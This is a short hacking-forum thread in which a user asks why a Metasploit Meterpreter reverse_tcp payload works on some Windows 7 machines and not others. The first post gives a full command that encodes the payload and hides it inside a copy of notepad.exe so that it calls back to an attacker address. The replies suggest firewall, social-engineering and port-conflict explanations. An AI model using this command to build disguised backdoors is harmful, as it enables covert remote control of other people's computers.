Results 1 to 5 of 5

Thread: windows/meterpreter/reverse_tcp.exe (PE) not working on all win7 machines Share/Save - My123World.Com!

  1. #1

    windows/meterpreter/reverse_tcp.exe (PE) not working on all win7 machines

    hi all,

    I am trying to generate a reverse_tcp executable for windows, using the following command :-

    ./msfpayload windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=443 R | ./msfencode -e x86/shikata_ga_nai -c 5 -k -x '/media/sf_Work/exes/notepad.exe' -t exe > notepad_back.exe

    Then I ported the notepad_back.exe file to two different win7 Pro machines. I notice that :-

    on one machine the notepad_back.exe runs and gives me a meterpreter session with a notepad application window on the victim end. But on the other windows machine the notepad_back.exe , simply doesnot do anything. Neither, I get a meterpreter session nor does notepad opens on the victim machine.
    what could be the reason for that ?

    thanks in advance for any help and suggestions

    regards

  2. #2
    Is the firewall turned on on the other machine?

    Though I have seen at scenario where you have most favor against you, you need to carry out SE attacks like browser based etc. This video Series on Security Tube might be helpful to you to understand scenario based hacking/pwning machines.

    Scenario Based Hacking and Penetration Testing | http://www.securitytube.net/groups?o...view&groupId=2
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

  3. #3
    hi prashant,
    there are no AV or Firewall. I tried this out on my own.
    any other suggestions The strange thing is that the reverse_Tcp.exe works perfectly on some machines and fails to execute on exactly similar other machines.
    thanks for your suggestions anyway
    jintao

  4. #4
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    I am finding it weird. Shall work ideally.
    Please do post solution here if you manage to resolve the issue.

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  5. #5
    Are you attempting both exploits at the same time? Are both versions of Notepad.exe binding to the same port on the attacking machine? If you run it once, it will occupy 443. Then, when you try running it again on the second machine, that port will already be in use.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •